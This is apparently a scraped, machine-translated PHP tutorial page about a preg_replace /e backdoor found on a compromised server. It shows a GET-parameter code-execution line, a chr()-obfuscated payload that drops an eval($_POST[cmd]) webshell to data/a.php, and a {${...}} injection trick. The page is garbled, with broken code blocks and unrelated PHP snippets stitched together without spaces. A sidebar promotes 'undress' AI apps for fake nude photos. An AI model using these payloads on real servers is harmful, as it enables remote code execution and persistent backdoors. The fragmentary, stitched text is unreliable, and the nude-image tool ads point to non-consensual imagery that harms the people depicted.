


preg_replace hidden backdoor and subsequent exploration_PHP tutorial
There are many PHP backdoors, and I have seen and played with Baozi a lot, but when I helped a friend check the server, I found such malicious code.
The thing is like this, using various backdoor search tools on my friend’s website, no PHP Trojan was found. I can’t always find it. Xiao Hei’s tricks are very advanced. Every time I use them
After using it, I always delete the backdoor, but I can still come in every time, but I can’t find where it came in. This is really painful.
Later, I finally found some clues in the logs. Through my analysis, I found that an IP always posted strange data to a certain file. Then a paragraph
After a while, this IP accessed an inexplicable file with a very conspicuous name. It was obviously not a normal system file, but a PHP backdoor. But soon after using the backdoor
was deleted.
Haha, Xiao Hei is very attentive when I meet him.
Then through analysis, it was found that the file discovery code accessed by Xiaohei:
The code is as follows | Copy code | ||||
|
No anti-virus software can detect it.
preg_replace function prototype:
mixed preg_replace (mixed pattern, mixed replacement, mixed subject [, int limit])
Special instructions:
The
/e modifier causes preg_replace() to treat the replacement argument as PHP code (after appropriate backreferences have been replaced). Tip: Make surereplacement forms a valid PHP code string, otherwise PHP will report a syntax parsing error on the line containing preg_replace()
Wrong.
The above code is for POST to accept data and needs to be tested, which is more troublesome. If it is replaced by GET to obtain data. . .
Example:
代码如下 | 复制代码 |
echo preg_replace("/test/e",$_GET["h"],"jutst test"); |
The code is as follows | Copy code |
echo preg_replace("/test/e",$_GET["h"],"jutst test"); |
If we submit ?h=phpinfo(), phpinfo() will be executed (using the /e modifier, preg_replace will treat the replacement parameter as PHP
Code execution).
代码如下 | 复制代码 |
(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr (112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr (104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr (83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59)) |
The code is as follows | Copy code | ||||
?h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112). chr(101).chr
|
The code is as follows | Copy code |
fputs(fopen(data/a.php,w),); |
The execution result is to generate a one-sentence Trojan file a.php in the /data/ directory.
This is terrifying. . . .
Another difficult example:
View code printing?
The code is as follows
|
Copy code
|
||||
function test($str) { } echo preg_replace("/s*[php](.+?)[/php]s*/ies", 'test("1")', $_GET["h"]); ?>
Submit ?h=[php]phpinfo()[/php], will phpinfo() be executed? Definitely not. Because after regular matching, the replacement parameter becomes 'test("phpinfo")', and phpinfo is only used as a string parameter at this time Counted. Is there any way to make it execute? Of course. If we submit ?h=[php]{${phpinfo()}}[/php] here, phpinfo() will be executed. Why?
In PHP, if there is a variable in double quotes, the PHP interpreter will replace it with the result of variable interpretation; variables in single quotes will not be processed. | Note: Functions enclosed in double quotes will not be executed and replaced.
(${phpinfo()} will be interpreted and executed).

ThesecrettokeepingaPHP-poweredwebsiterunningsmoothlyunderheavyloadinvolvesseveralkeystrategies:1)ImplementopcodecachingwithOPcachetoreducescriptexecutiontime,2)UsedatabasequerycachingwithRedistolessendatabaseload,3)LeverageCDNslikeCloudflareforservin

You should care about DependencyInjection(DI) because it makes your code clearer and easier to maintain. 1) DI makes it more modular by decoupling classes, 2) improves the convenience of testing and code flexibility, 3) Use DI containers to manage complex dependencies, but pay attention to performance impact and circular dependencies, 4) The best practice is to rely on abstract interfaces to achieve loose coupling.

Yes,optimizingaPHPapplicationispossibleandessential.1)ImplementcachingusingAPCutoreducedatabaseload.2)Optimizedatabaseswithindexing,efficientqueries,andconnectionpooling.3)Enhancecodewithbuilt-infunctions,avoidingglobalvariables,andusingopcodecaching

ThekeystrategiestosignificantlyboostPHPapplicationperformanceare:1)UseopcodecachinglikeOPcachetoreduceexecutiontime,2)Optimizedatabaseinteractionswithpreparedstatementsandproperindexing,3)ConfigurewebserverslikeNginxwithPHP-FPMforbetterperformance,4)

APHPDependencyInjectionContainerisatoolthatmanagesclassdependencies,enhancingcodemodularity,testability,andmaintainability.Itactsasacentralhubforcreatingandinjectingdependencies,thusreducingtightcouplingandeasingunittesting.

Select DependencyInjection (DI) for large applications, ServiceLocator is suitable for small projects or prototypes. 1) DI improves the testability and modularity of the code through constructor injection. 2) ServiceLocator obtains services through center registration, which is convenient but may lead to an increase in code coupling.

PHPapplicationscanbeoptimizedforspeedandefficiencyby:1)enablingopcacheinphp.ini,2)usingpreparedstatementswithPDOfordatabasequeries,3)replacingloopswitharray_filterandarray_mapfordataprocessing,4)configuringNginxasareverseproxy,5)implementingcachingwi

PHPemailvalidationinvolvesthreesteps:1)Formatvalidationusingregularexpressionstochecktheemailformat;2)DNSvalidationtoensurethedomainhasavalidMXrecord;3)SMTPvalidation,themostthoroughmethod,whichchecksifthemailboxexistsbyconnectingtotheSMTPserver.Impl


Hot AI Tools

Undresser.AI Undress
AI-powered app for creating realistic nude photos

AI Clothes Remover
Online AI tool for removing clothes from photos.

Undress AI Tool
Undress images for free

Clothoff.io
AI clothes remover

Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

Hot Tools

SublimeText3 Linux new version
SublimeText3 Linux latest version

MantisBT
Mantis is an easy-to-deploy web-based defect tracking tool designed to aid in product defect tracking. It requires PHP, MySQL and a web server. Check out our demo and hosting services.

Zend Studio 13.0.1
Powerful PHP integrated development environment

SAP NetWeaver Server Adapter for Eclipse
Integrate Eclipse with SAP NetWeaver application server.

VSCode Windows 64-bit Download
A free and powerful IDE editor launched by Microsoft
